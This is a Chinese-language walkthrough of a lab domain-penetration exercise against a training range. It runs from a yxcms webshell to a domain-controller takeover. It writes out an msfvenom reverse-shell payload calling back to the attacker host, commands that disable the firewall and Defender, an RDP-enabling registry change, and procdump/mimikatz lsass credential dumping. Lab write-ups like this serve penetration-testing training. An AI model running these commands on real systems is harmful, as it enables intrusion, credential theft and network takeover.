环境搭建

该靶机是红日安全团队出的域渗透靶机
1.png
VM1win7Web服务器
VM2windows2003是域成员
VM3windows2008是域控
在虚拟机网络编辑器中添加一个VMnet2来模拟内网环境,设置如下
2.jpg
win7的网络配置如下
3.jpg
设置两块网卡,VMnet1用于连接外网,VMnet2让它处于内网
同理windows2003windows2008网络适配器都选择VMnet2这样这三台的内网环境就搭建好了,自己的攻击机kali网络适配器也设置为VMnet1
最后ip如下

kali:192.168.225.128
win7:192.168.52.143(内) 192.168.225.129(外)
windows2003:192.168.52.141
windows2008:192.168.52.138

打开Win7phpstudy开始渗透之旅

拿下webshell

扫描一下网站目录
5.jpg
发现都有目录遍历,暂时没有可利用的地方
6.jpg
注册一个账号登录后没有找到可利用的地方,观察url发现?r=menber,猜想管理员登录界面是?r=admin,确实是这样,当然已经知道它是yxcms所以不存在找不到它的后台。。。
先整一把弱密码admin/adminadmin888123456等等,发现后台密码是123456
进入后台查看功能,可以执行SQL语句,可以改前台模板文件的php源代码
4.jpg
所以就往源代码里面植入一句话拿到webshell,因为不知道文件路径,所以查了一下yxcms手册找到路径为http://192.168.225.129/yxcms/protected/apps/default/view/default/,当然因为有目录遍历也可以慢慢找到
新建hello.php文件,内容为一句话
7.jpg
拿到webshell
9.jpg
发现安装有python,为了更好地渗透所以将这个shell反弹到msf上面,利用

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.225.128 LPORT=4444 -o /root/shell.py

生成python反弹shellmsf马,通过蚁剑上传,虚拟终端执行,kali监听,成功反弹到msf
8.jpg

权限提升

开放端口情况
10.jpg
系统信息
11.jpg
Win7系统,打了KB2534111、KB2999226、KB976902三个补丁
systeminfo信息保存到本地,利用Windows-Exploit-Suggester查询可以利用的漏洞
13.jpg
也可以使用post/multi/recon/local_exploit_suggester模块
20.jpg
挺多漏洞可以利用的,找到最需要的ms16-014提权漏洞
输入background将会话保存为session1
14.jpg
msf上搜索一下ms16-014看看有不有exp,发现有
15.jpg
然后利用
16.jpg
我是用python反弹的meterpreter,这里有个python编码错误。。。所以就使用exe文件作后门吧
17.jpg
通过蚁剑上传,然后虚拟终端执行,kali监听,拿到shell
18.jpg
为了隐藏踪迹先讲进程迁移到explorer.exe
19.jpg
这下再次background,然后利用ms16-014exp
发现ms16-014、ms16-075、ms10-092全部攻击成功但是没有会话生成,是不是没有关防火墙的原因
使用netsh advfirewall set allprofiles state off来关闭防火墙
再使用net stop windefend关闭windefend
21.jpg
然后使用ms16-014exp打一下没有建立会话,回到会话getsystem发现就是系统权限,不清楚这是巧合还是啥的(上面不用关防火墙这样应该可以)
22.jpg
经重新搭建win7靶机证实,拿到meterpreter后直接getsystem就能拿到系统权限,不需要这些提权操作,当然上面提权操作也算是作为一种思路,getsystem确实是惊喜

开启3389

之前已经查询到没有开启3389端口
使用

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

命令开启3389端口
12.jpg
因为是系统权限所以添加用户并添加到管理员组
23.jpg
远程桌面登录,发现非服务器的windows只能允许一个用户登录,如果一定要登录就会让已经登录了的用户下线
上传Windows用户多开工具rdpwrap,执行
24.jpg
远程桌面成功登录
25.jpg

hash密码抓取

这个时候可以上传procdump
26.jpg
procdump是微软的官方工具,不会被杀,所以如果你的mimikatz不免杀,可以用procdump导出lsass.dmp后拖回本地抓取密码来规避杀软,上传后执行命令

procdump64.exe -accepteula -ma lsass.exe lsass.dmp

27.jpg
我的mimikatz免杀效果挺好所以直接上传,然后利用lsass.dmp
mimikatz中先后执行如下命令

sekurlsa::minidump lsass.dmp
sekurlsa::logonpasswords

抓取到Administartor明文密码
28.jpg
如果不用procdump那么直接抓取可能会失败,给个参考链接
https://www.jianshu.com/p/e56e5bfde25b

横向渗透

先添加一条路由进来
29.jpg
查看一下
30.jpg
也就是192.168.52.129是跳板机
利用arp -a查看内网存活主机
31.jpg
发现存在192.168.52.141(ps:域控主机我没暂时没开,虚拟机开多了卡,2333)
然后利用扫描端口模块扫描192.168.52.141开放端口
32.jpg
开启了445端口,所以利用auxiliary/scanner/smb/smb_version可以扫描系统版本,扫描结果是windows2003
33.jpg
使用ms08-067打一下,发现打不了
34.jpg
再注意到开启了21端口看是否允许匿名登录,扫描一下
36.jpg
发现是允许匿名登录的,通过代理nmap扫描不出ftp具体版本,各种ftpexp也没打通
开始尝试ms17-010,直接拿不到shell,发现可以使用auxiliary/admin/smb/ms17_010_command来执行一些命令且是系统权限,于是执行新建用户添加管理员,打开3389,然后通过proxychains远程桌面连接
37.jpg
成功横向拿下第二台主机

拿下域控

定位到域控制器的ip192.168.52.138
还是先利用smb扫描系统版本
38.jpg
因为之前抓到了域管理的账号密码所以直接使用exploit/windows/smb/psexec模块拿下域控,且是管理员权限
39.jpg
为了方便还是把他远程桌面顺带一起打开吧,关闭防火墙或者只开放3389(推荐,动静小),通过代理连接
40.jpg